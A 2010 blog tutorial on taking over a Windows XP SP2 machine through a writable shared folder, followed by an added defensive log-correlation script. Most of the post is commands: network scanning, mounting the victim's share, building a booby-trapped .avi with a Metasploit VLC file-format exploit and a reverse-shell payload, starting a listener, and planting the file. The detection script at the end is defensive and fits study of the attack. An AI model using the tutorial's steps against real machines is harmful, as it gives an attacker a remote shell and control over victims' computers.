Saturday, September 4, 2010

Sickness - Owning a Windows XP with Metasploit.



OK, so first of all, I did not do any video editing, so don't complain about it!
Second of all, excuse me if I made some English mistakes; I'm not a perfect English speaker.
Third, this is a basic video.

So in this tutorial I am going to show you how to own a Windows XP SP2 machine that has the "My Documents" folder shared with read/write permissions, by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Moving the .avi onto the mounted share:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media
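
Seen from the defending side, the chain above leaves two events that can be correlated: a media file written to a shared folder from a remote machine, and later a media player on that same host connecting out to the machine that wrote the file. The following is an added example, not part of the original post; the log line format, field names, extension list, player list and time window are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

MEDIA_EXT = (".avi", ".mpg", ".mp4", ".mkv", ".ty")   # assumed watch list
PLAYERS = {"vlc.exe", "wmplayer.exe"}                  # assumed player processes
WINDOW = timedelta(hours=24)                           # assumed correlation window

# Constructed sample events (hypothetical format): share file-write audit
# records and per-process outbound connection records from the XP host.
SAMPLE = """\
2010-09-04T10:02:11 smb_write src=192.168.1.64 host=192.168.1.66 path=Documents\\Downloads\\watch_me.avi
2010-09-04T10:05:40 smb_write src=192.168.1.70 host=192.168.1.66 path=Documents\\notes.txt
2010-09-04T10:31:02 net_connect host=192.168.1.66 proc=vlc.exe dst=192.168.1.64 dport=4444
2010-09-04T10:40:19 net_connect host=192.168.1.66 proc=iexplore.exe dst=192.168.1.1 dport=80
2010-09-04T11:00:00 net_connect host=192.168.1.66 proc=vlc.exe dst=192.168.1.70 dport=8080
"""

def parse(line):
    """Split 'time kind key=value ...' into a dict (values contain no spaces)."""
    ts, kind, *pairs = line.split()
    ev = dict(p.split("=", 1) for p in pairs)
    ev["time"], ev["kind"] = datetime.fromisoformat(ts), kind
    return ev

def correlate(lines):
    """Return (write, connect) pairs where a media player on a host connects
    out to the machine that earlier wrote a media file to that host's share."""
    drops, alerts = [], []
    events = [parse(l) for l in lines if l.strip()]
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["kind"] == "smb_write" and ev["path"].lower().endswith(MEDIA_EXT):
            drops.append(ev)                       # remember remote media drops
        elif ev["kind"] == "net_connect" and ev["proc"].lower() in PLAYERS:
            for d in drops:
                same_host = d["host"] == ev["host"]
                back_to_writer = d["src"] == ev["dst"]
                if same_host and back_to_writer and ev["time"] - d["time"] <= WINDOW:
                    alerts.append((d, ev))
    return alerts

if __name__ == "__main__":
    for drop, conn in correlate(SAMPLE.splitlines()):
        print(f"ALERT {conn['host']}: {conn['proc']} -> {conn['dst']}:{conn['dport']} "
              f"after {drop['src']} wrote {drop['path']} at {drop['time']}")
```

The rule keys on the writer's address rather than on a port, so it still fires if the listener port is changed. Removing write access from the share takes away the first event entirely.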
